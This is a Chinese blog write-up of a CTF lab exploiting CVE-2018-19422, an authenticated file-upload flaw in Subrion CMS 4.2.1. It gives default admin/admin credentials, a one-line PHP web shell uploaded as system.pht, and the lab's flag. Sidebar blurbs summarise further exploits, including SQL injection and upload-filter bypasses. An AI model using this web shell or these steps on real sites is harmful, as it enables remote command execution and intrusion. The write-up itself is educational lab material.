春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

最新推荐文章于 2024-03-01 22:46:45 发布
最新推荐文章于 2024-03-01 22:46:45 发布
阅读量911 收藏 1
点赞数
分类专栏: i春秋 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/132445466
版权

一、题目

 靶标介绍:

Subrion CMS 4.2.1 存在文件上传漏洞

进入题目:

admin/admin 

  点击设置:

 后台管理主页:

 上传页面:

上传目录:

/panel/uploads/

  查看上传位置:

system.pht

<?php system($_GET[1]);phpinfo();?>

 上传位置:

 uploads/system.pht

 flag{24505f02-d430-4d3b-905e-17349e09c34c}

橙子学不会.
关注
专栏目录
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT输出利用rtf -i IP,--ip IP表示netcat -p PORT ,--port netcat的PORT端口 例如: ...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
Subrion CMS存在SQL注入(CVE-2021-41947)
weixin_68999845的博客
07-21 1361
get=access&type=blocks后,是否紧跟恶意sql注入payload,若存在,则观察响应体result部分是否回显出敏感信息,若出现,则攻击成功。Subrion CMS v4.2.1版本在可视模式下存在SQL注入漏洞。(type、object和page参数后的value可为任意值type后的值跟单引号闭合),即可得到敏感信息。字符型注入,参数type用单引号标识,代码未对敏感关键字进行判断,只需单引号闭合即可绕过,从而获取敏感信息。type字段后的值跟单引号闭合,后用“-- -”闭合。
[HackMyVM]靶场 Adria
最新发布
qq_34942239的博客
03-01 414
先是读取/root/pass里面的密码,然后让用户输入一个密码,如果两个密码相等,html文件压缩再用PASSWORD加密。自己测试上传发现php文件不行,看了exp需要将后缀改成phar,改完之后可以RCE了。找了一下没有利用点,找找后台,源码里发现这是个Subrion 4.2CMS。那么如果此时用pspy64监控进程,那么比较的密码我们就能抓取。里面没什么有用的东西,注册需要邮箱,这里本地注册不了。因为开启了smb服务,用enum4linux扫一下。网上搜一下,没看到后台,但是发现有个文件上传漏洞
[春秋云镜]CVE-2018-19422
niubi707的博客
12-02 5869
春秋云镜CVE-2018-19422Subrion CMS 4.2.1 存在文件上传漏洞
春秋云镜 CVE-2018-19422
qq_22002773的博客
09-02 408
春秋云镜 CVE-2018-19422
CVE-2018-19422漏洞复现
2301_78321656的博客
07-10 1202
1.登录后台http://eci-2zedt4oqp4irmp9n6izk.cloudeci1.ichunqiu.com/panel/Subrion CMS 4.2.1 存在文件上传漏洞。3.创建php一句话木马,格式改为pht。账户密码:admin/admin。5.复制木马路径链接中国蚁剑。
Vulnhub_Venom
weixin_44193247的博客
02-21 836
Vulnhub_Venom
春秋云镜靶机
niqiu320的博客
04-10 1640
Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。WSO2文件上传漏洞CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞
cve-2018-2894:cve-2018-2894 不同别人的利用方法
04-29
Weblogic任意文件上传漏洞CVE-2018-2894) 最近大家都在说这个漏洞,大家都注意到config.do这里发生了问题,但是其实根据 这里的信息,begin.do也是有问题。少扯淡,下面给出具体利用方法: 问题就出现下下面这个...
Subrion开源外贸建站系统 v4.1.4
11-30
SubrionCMS是一套多功能建站系统,适用于外贸行业; 支持主题切换、插件拓展; 可在后台管理页面、发布文章; 支持会员系统,可以自主分配会员权限; 自带计划发布、邮件收发功能,
Subrion CMS 4.1.4.zip
05-25
Subrion CMS是一个免费的开源内容管理系统,这允许您为任何目的构建网站,从博客到企业大型门户。Subrion CMS 4.1.4 更新日志:2017-05-16错误#125:为多语言网站生成不正确的站点地图;错误#400:重新加载页面后,保持选定的参数在网格中;错误#419:头像不显示在收藏夹页面上;错误#425:如果文件名包含非拉丁字符,图像将以不正确的名称保存;错误#427:将站点地图生成修改为多语言字段;错误#431:由插件创建的项目没有所有功能;错误#435:日期显示不正确;错误#436:混合认证不能正常工作;错误#442:HybridAuth:Facebook登录不起作用;错误#443:如果由内部系统资金支付,支付过程执行两次;错误#444:主语言值丢失;功能#360:改进模块部分;功能#365:创建语言时提供更多信息;功能#423:添加使用EXIF数据的图像的方向修复;功能#434:删除时从收藏夹中删除项目;功能#438:更改文本字段的列类型。
subrion, Subrion CMS开放源码php内容管理系统.zip
09-18
subrion, Subrion CMS开放源码php内容管理系统 Subrion CMS 什么是 SubrionSubrion是一个收费内容管理系统( CMS ),它允许你为任何目的建立网站。 是,从博客到公司大型门户。它是一个强大的web应用程序,需要一个带有 php/。S
CVE-2018-4193:CVE-2018-4193的漏洞利用
03-17
**CVE-2018-4193详解:Objective-C框架中的安全漏洞利用** **一、漏洞背景** CVE-2018-4193是2018年...通过深入研究提供的压缩包文件"CVE-2018-4193-master",我们可以更详细地学习这个漏洞的细节和可能的解决方案。
CVE-2018-8120:CVE-2018-8120 Windows LPE攻击
05-16
CVE-2018-8120 CVE-2018-8120 Windows LPE攻击 同时支持x32和x64。 经过测试:Win7 x32,Win7 x64,Win2008 x32,Win2008 R2 x32,Win2008 R2 Datacenter x64,Win2008 Enterprise x64。 用法 CVE-2018-8120 ...
vulnhub之VENOM:1
weixin_42478365的博客
01-27 612
漏洞靶场
Vulnhub-TECH_SUPP0RT: 1渗透
laoyanCZ的博客
01-20 1340
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文Vulnhub靶机下载连接-戳我直接下载!👈。
记录一次bugku AWD模拟赛
weixin_52365980的博客
11-07 907
使用Antsward进行连接,成功获取到flag(这里只要在文件上传时过滤文件后缀名即可做到加固的作用,咱就是说这里就不建议上waf,这里会直接导致网站访问不到,踩雷了扣100分)这里找到一个文件上传点,可以传入一句话木马进行getshell,这里使用pht或者phar后缀进行上传以免被waf检测到删除。3.审计并没有什么结果,继续分析网站,发现网站框架为Subrion CMS v 4.1.4,找到该版本可以利用的漏洞。5.这里还发现一个漏洞,在/game中有一个文件包含漏洞。1.扫描局域网内存活主机。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值